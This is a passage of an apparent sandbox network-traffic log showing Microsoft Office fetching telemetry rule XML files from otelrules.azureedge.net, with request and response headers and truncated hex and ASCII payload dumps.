                                                                                                                                                                                  2024-11-23 13:47:50 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  120192.168.2.44991213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:49 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:50 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1364
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                  x-ms-request-id: c476523a-d01e-008e-6755-3b387a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134750Z-15b8b599d88l2dpthC1TEBmzr0000000031g000000003kht
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:50 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  121192.168.2.44991413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:51 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:51 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1391
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                  x-ms-request-id: 23c3770b-601e-0084-293a-3c6b3f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134751Z-178bfbc474bh5zbqhC1NYCkdug00000004gg0000000066vm
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:51 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  122192.168.2.44991713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:51 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:52 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                  x-ms-request-id: 652d7de6-201e-0033-5d3c-3cb167000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134752Z-15b8b599d8885prmhC1TEBsnkw000000035g0000000065ga
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:52 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  123192.168.2.44991513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:52 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:52 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1354
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                  x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134752Z-15b8b599d88wn9hhhC1TEBry0g00000002zg00000000ebnf
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:52 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  124192.168.2.44991613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:52 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:52 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                  x-ms-request-id: efcbc6c0-c01e-008d-3f44-3c2eec000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134752Z-15b8b599d88wn9hhhC1TEBry0g000000032g000000008k9q
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  125192.168.2.44991813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:52 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:52 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1399
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                  x-ms-request-id: 20e9f7cf-701e-005c-216c-3bbb94000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134752Z-174c587ffdf8fcgwhC1TEBnn70000000031g00000000n3tf
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:52 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  126192.168.2.44991913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:53 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:53 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF497570"
                                                                                                                                                                                  x-ms-request-id: ff0b0d52-c01e-002b-2681-3b6e00000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134753Z-174c587ffdfn4nhwhC1TEB2nbc000000032000000000cyeg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:54 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  127192.168.2.44992013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:54 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:54 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                  x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134754Z-174c587ffdfcj798hC1TEB9bq4000000034000000000fw5v
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:54 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  128192.168.2.44992313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:54 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:54 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                  x-ms-request-id: 39e7be55-101e-008d-7d03-3d92e5000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134754Z-178bfbc474bw8bwphC1NYC38b400000004a000000000dfwg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:54 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  129192.168.2.44992213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
